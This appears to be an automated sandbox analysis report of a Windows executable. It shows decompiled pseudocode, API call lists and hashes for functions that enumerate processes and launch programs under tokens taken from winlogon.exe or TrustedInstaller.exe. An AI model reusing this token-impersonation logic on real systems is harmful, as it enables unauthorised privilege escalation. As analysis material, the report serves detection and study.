                                                                                                                                                                    • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                                                                    • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                                                                    • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                                                                    • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                                                                  • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                                                                                  • swscanf.MSVCRT ref: 00408620
                                                                                                                                                                  • _wtoi.MSVCRT ref: 00408633
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                                                                  • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                                                                  • API String ID: 3933224404-3784219877
                                                                                                                                                                  • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                                                                  • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                                                                  • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                                  			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                                                                  0x00401fe6
                                                                                                                                                                  0x00401ff1
                                                                                                                                                                  0x00401ff3
                                                                                                                                                                  0x00401fff
                                                                                                                                                                  0x00402002
                                                                                                                                                                  0x004020a8
                                                                                                                                                                  0x004020ab
                                                                                                                                                                  0x004020f3
                                                                                                                                                                  0x004020f6
                                                                                                                                                                  0x00402162
                                                                                                                                                                  0x00402165
                                                                                                                                                                  0x004021f2
                                                                                                                                                                  0x004021f5
                                                                                                                                                                  0x00402235
                                                                                                                                                                  0x00402238
                                                                                                                                                                  0x004022be
                                                                                                                                                                  0x0040223a
                                                                                                                                                                  0x0040223a
                                                                                                                                                                  0x00402240
                                                                                                                                                                  0x0040224b
                                                                                                                                                                  0x0040224e
                                                                                                                                                                  0x00402251
                                                                                                                                                                  0x00402254
                                                                                                                                                                  0x00402259
                                                                                                                                                                  0x0040225e
                                                                                                                                                                  0x00402262
                                                                                                                                                                  0x00402264
                                                                                                                                                                  0x00402264
                                                                                                                                                                  0x00402264
                                                                                                                                                                  0x00402262
                                                                                                                                                                  0x00402266
                                                                                                                                                                  0x0040226c
                                                                                                                                                                  0x00402271
                                                                                                                                                                  0x00402274
                                                                                                                                                                  0x00402276
                                                                                                                                                                  0x0040229a
                                                                                                                                                                  0x0040229a
                                                                                                                                                                  0x00402278
                                                                                                                                                                  0x00402296
                                                                                                                                                                  0x00402296
                                                                                                                                                                  0x0040229c
                                                                                                                                                                  0x0040229c
                                                                                                                                                                  0x004022c0
                                                                                                                                                                  0x004022c2
                                                                                                                                                                  0x004022c8
                                                                                                                                                                  0x004022c8
                                                                                                                                                                  0x004022c8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004022c0
                                                                                                                                                                  0x00402201
                                                                                                                                                                  0x00402203
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402220
                                                                                                                                                                  0x00402225
                                                                                                                                                                  0x00402227
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040222d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040222d
                                                                                                                                                                  0x00402173
                                                                                                                                                                  0x00402179
                                                                                                                                                                  0x0040217b
                                                                                                                                                                  0x0040217e
                                                                                                                                                                  0x00402183
                                                                                                                                                                  0x00402185
                                                                                                                                                                  0x00402188
                                                                                                                                                                  0x0040218d
                                                                                                                                                                  0x0040218f
                                                                                                                                                                  0x00402192
                                                                                                                                                                  0x004021a2
                                                                                                                                                                  0x004021a7
                                                                                                                                                                  0x004021a9
                                                                                                                                                                  0x004021ac
                                                                                                                                                                  0x004021cc
                                                                                                                                                                  0x004021d1
                                                                                                                                                                  0x004021d3
                                                                                                                                                                  0x004021db
                                                                                                                                                                  0x004021db
                                                                                                                                                                  0x004021e1
                                                                                                                                                                  0x004021e1
                                                                                                                                                                  0x004021e7
                                                                                                                                                                  0x004021e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402192
                                                                                                                                                                  0x004020fe
                                                                                                                                                                  0x00402103
                                                                                                                                                                  0x00402105
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402111
                                                                                                                                                                  0x00402114
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402114
                                                                                                                                                                  0x004020ad
                                                                                                                                                                  0x004020b4
                                                                                                                                                                  0x004020b9
                                                                                                                                                                  0x004020bc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004020c2
                                                                                                                                                                  0x004020c4
                                                                                                                                                                  0x004020ce
                                                                                                                                                                  0x004020d0
                                                                                                                                                                  0x004020d3
                                                                                                                                                                  0x004020d4
                                                                                                                                                                  0x004020d5
                                                                                                                                                                  0x004020e6
                                                                                                                                                                  0x004020e7
                                                                                                                                                                  0x004020d7
                                                                                                                                                                  0x004020d7
                                                                                                                                                                  0x004020dd
                                                                                                                                                                  0x004020de
                                                                                                                                                                  0x004020df
                                                                                                                                                                  0x004020df
                                                                                                                                                                  0x004020ec
                                                                                                                                                                  0x004020ef
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004020ef
                                                                                                                                                                  0x00402008
                                                                                                                                                                  0x00402016
                                                                                                                                                                  0x0040201d
                                                                                                                                                                  0x0040202e
                                                                                                                                                                  0x00402035
                                                                                                                                                                  0x00402044
                                                                                                                                                                  0x00402049
                                                                                                                                                                  0x00402055
                                                                                                                                                                  0x00402064
                                                                                                                                                                  0x00402068
                                                                                                                                                                  0x0040206e
                                                                                                                                                                  0x0040208b
                                                                                                                                                                  0x00402070
                                                                                                                                                                  0x00402082
                                                                                                                                                                  0x00402088
                                                                                                                                                                  0x0040209e
                                                                                                                                                                  0x004020a1
                                                                                                                                                                  0x00402119
                                                                                                                                                                  0x00402119
                                                                                                                                                                  0x0040211b
                                                                                                                                                                  0x0040211e
                                                                                                                                                                  0x0040211e
                                                                                                                                                                  0x00402149
                                                                                                                                                                  0x00402151
                                                                                                                                                                  0x00402151
                                                                                                                                                                  0x00402157
                                                                                                                                                                  0x00402157
                                                                                                                                                                  0x004022cb
                                                                                                                                                                  0x004022d2
                                                                                                                                                                  0x004022d2

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040201D
                                                                                                                                                                  • memset.MSVCRT ref: 00402035
                                                                                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                  • wcslen.MSVCRT ref: 00402050
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040205F
                                                                                                                                                                  • wcslen.MSVCRT ref: 004020B4
                                                                                                                                                                  • _wtoi.MSVCRT ref: 004020D7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                                                                  • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                                                                  • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                                                                    • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                                                                    • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                                                                    • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                                                                    • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                                                                    • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                  • wcschr.MSVCRT ref: 00402259
                                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                                                                  • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                                                                  • API String ID: 3201562063-2355939583
                                                                                                                                                                  • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                  • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                                                                  • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                  • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}































                                                                                                                                                                  0x00409609
                                                                                                                                                                  0x0040960f
                                                                                                                                                                  0x00409619
                                                                                                                                                                  0x00409623
                                                                                                                                                                  0x0040962e
                                                                                                                                                                  0x00409633
                                                                                                                                                                  0x00409640
                                                                                                                                                                  0x0040964a
                                                                                                                                                                  0x00409782
                                                                                                                                                                  0x0040978c
                                                                                                                                                                  0x00409793
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040965a
                                                                                                                                                                  0x0040965f
                                                                                                                                                                  0x00409678
                                                                                                                                                                  0x0040967e
                                                                                                                                                                  0x00409681
                                                                                                                                                                  0x00409685
                                                                                                                                                                  0x00409688
                                                                                                                                                                  0x004096b2
                                                                                                                                                                  0x004096bf
                                                                                                                                                                  0x004096c6
                                                                                                                                                                  0x004096cb
                                                                                                                                                                  0x004096da
                                                                                                                                                                  0x004096e6
                                                                                                                                                                  0x0040973b
                                                                                                                                                                  0x00409747
                                                                                                                                                                  0x0040975f
                                                                                                                                                                  0x00409764
                                                                                                                                                                  0x0040976a
                                                                                                                                                                  0x00409770
                                                                                                                                                                  0x00409773
                                                                                                                                                                  0x0040977d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040977d
                                                                                                                                                                  0x004096ee
                                                                                                                                                                  0x004096f5
                                                                                                                                                                  0x004096fc
                                                                                                                                                                  0x00409704
                                                                                                                                                                  0x0040970c
                                                                                                                                                                  0x0040971c
                                                                                                                                                                  0x0040971c
                                                                                                                                                                  0x00409704
                                                                                                                                                                  0x00409721
                                                                                                                                                                  0x00409728
                                                                                                                                                                  0x00409739
                                                                                                                                                                  0x00409739
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409728
                                                                                                                                                                  0x00409693
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004096a5
                                                                                                                                                                  0x004096a9
                                                                                                                                                                  0x004096ac
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004096ac
                                                                                                                                                                  0x004097a6

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                                                                  • memset.MSVCRT ref: 0040962E
                                                                                                                                                                  • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                                                                  • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                                                                  • memset.MSVCRT ref: 004096C6
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                                                                  • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                  • API String ID: 239888749-1740548384
                                                                                                                                                                  • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                  • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                                                                  • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                                                                  0x00409924
                                                                                                                                                                  0x0040992c
                                                                                                                                                                  0x00409937
                                                                                                                                                                  0x0040993f
                                                                                                                                                                  0x0040994a
                                                                                                                                                                  0x00409956
                                                                                                                                                                  0x00409962
                                                                                                                                                                  0x0040996e
                                                                                                                                                                  0x00409971
                                                                                                                                                                  0x00409973
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409976
                                                                                                                                                                  0x00409977

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                  • API String ID: 1529661771-70141382
                                                                                                                                                                  • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                                                                  • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                                                                  • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                                                                  • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
